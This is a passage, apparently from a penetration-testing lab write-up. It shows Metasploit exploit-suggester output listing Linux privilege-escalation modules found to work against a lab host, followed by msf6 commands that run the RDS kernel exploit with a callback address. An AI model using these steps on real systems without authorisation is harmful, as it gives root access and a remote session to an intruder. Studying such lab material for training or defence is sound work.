glibc distributions do not contain the libpcprofile.so library
required for successful exploitation.
[+] 10.11.1.160 - exploit/linux/local/glibc_origin_expansion_priv_esc: The service is running, but could not be validated. /bin/ping is not setuid
This module attempts to gain root privileges on Linux systems by
abusing a vulnerability in the GNU C Library (glibc) dynamic linker.
glibc `ld.so` versions before 2.11.3, and 2.12.x before 2.12.2 does
not properly restrict use of the `LD_AUDIT` environment variable
when loading setuid executables which allows control over the
`$ORIGIN` library search path resulting in execution of arbitrary
shared objects. This module opens a file descriptor to the specified
suid executable via a hard link, then replaces the hard link with a
shared object before instructing the linker to execute the file
descriptor, resulting in arbitrary code execution. The specified
setuid binary must be readable and located on the same file system
partition as the specified writable directory. This module has been
tested successfully on: glibc 2.5 on CentOS 5.4 (x86_64); glibc 2.5
on CentOS 5.5 (x86_64); glibc 2.12 on Fedora 13 (i386); and glibc
2.5-49 on RHEL 5.5 (x86_64). Some versions of `ld.so`, such as the
version shipped with Ubuntu 14, hit a failed assertion in
`dl_open_worker` causing exploitation to fail.
[+] 10.11.1.160 - exploit/linux/local/pkexec: The target appears to be vulnerable.
A race condition flaw was found in the PolicyKit pkexec utility and
polkitd daemon. A local user could use this flaw to appear as a
privileged user to pkexec, allowing them to execute arbitrary
commands as root by running those commands with pkexec. Those
vulnerable include RHEL6 prior to polkit-0.96-2.el6_0.1 and Ubuntu
libpolkit-backend-1 prior to 0.96-2ubuntu1.1 (10.10) 0.96-2ubuntu0.1
(10.04 LTS) and 0.94-1ubuntu1.1 (9.10)
[+] 10.11.1.160 - exploit/linux/local/rds_rds_page_copy_user_priv_esc: The target appears to be vulnerable.
This module exploits a vulnerability in the `rds_page_copy_user`
function in `net/rds/page.c` (RDS) in Linux kernel versions 2.6.30
to 2.6.36-rc8 to execute code as root (CVE-2010-3904). This module
has been tested successfully on: Fedora 13 (i686) kernel version
2.6.33.3-85.fc13.i686.PAE; and Ubuntu 10.04 (x86_64) with kernel
version 2.6.32-21-generic.
[+] 10.11.1.160 - exploit/linux/local/su_login: The target appears to be vulnerable.
This module attempts to create a new login session by invoking the
su command of a valid username and password. If the login is
successful, a new session is created via the specified payload.
Because su forces passwords to be passed over stdin, this module
attempts to invoke a psuedo-terminal with python, python3, or
script.
[+] 10.11.1.160 - exploit/linux/local/tomcat_ubuntu_log_init_priv_esc: The target appears to be vulnerable. Vulnerable app version detected: 6.0.24.pre.2ubuntu1
Tomcat (6, 7, 8) packages provided by default repositories on
Debian-based distributions (including Debian, Ubuntu etc.) provide a
vulnerable tomcat init script that allows local attackers who have
already gained access to the tomcat account (for example, by
exploiting an RCE vulnerability in a java web application hosted on
Tomcat, uploading a webshell etc.) to escalate their privileges from
tomcat user to root and fully compromise the target system. Tested
against Tomcat 8.0.32-1ubuntu1.1 on Ubuntu 16.04
[*] Running check method for exploit 64 / 64
[*] 10.11.1.160 - Valid modules for session 4:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/linux/local/glibc_ld_audit_dso_load_priv_esc Yes The service is running, but could not be validated. /bin/ping is not setuid
2 exploit/linux/local/glibc_origin_expansion_priv_esc Yes The service is running, but could not be validated. /bin/ping is not setuid
3 exploit/linux/local/pkexec Yes The target appears to be vulnerable.
4 exploit/linux/local/rds_rds_page_copy_user_priv_esc Yes The target appears to be vulnerable.
5 exploit/linux/local/su_login Yes The target appears to be vulnerable.
6 exploit/linux/local/tomcat_ubuntu_log_init_priv_esc Yes The target appears to be vulnerable. Vulnerable app version detected: 6.0.24.pre.2ubuntu1
```
```sh
msf6 exploit(linux/local/tomcat_ubuntu_log_init_priv_esc) > use exploit/linux/local/rds_rds_page_copy_user_priv_esc
```

```sh
msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set session 4
msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set lhost 172.16.1.1
msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run
```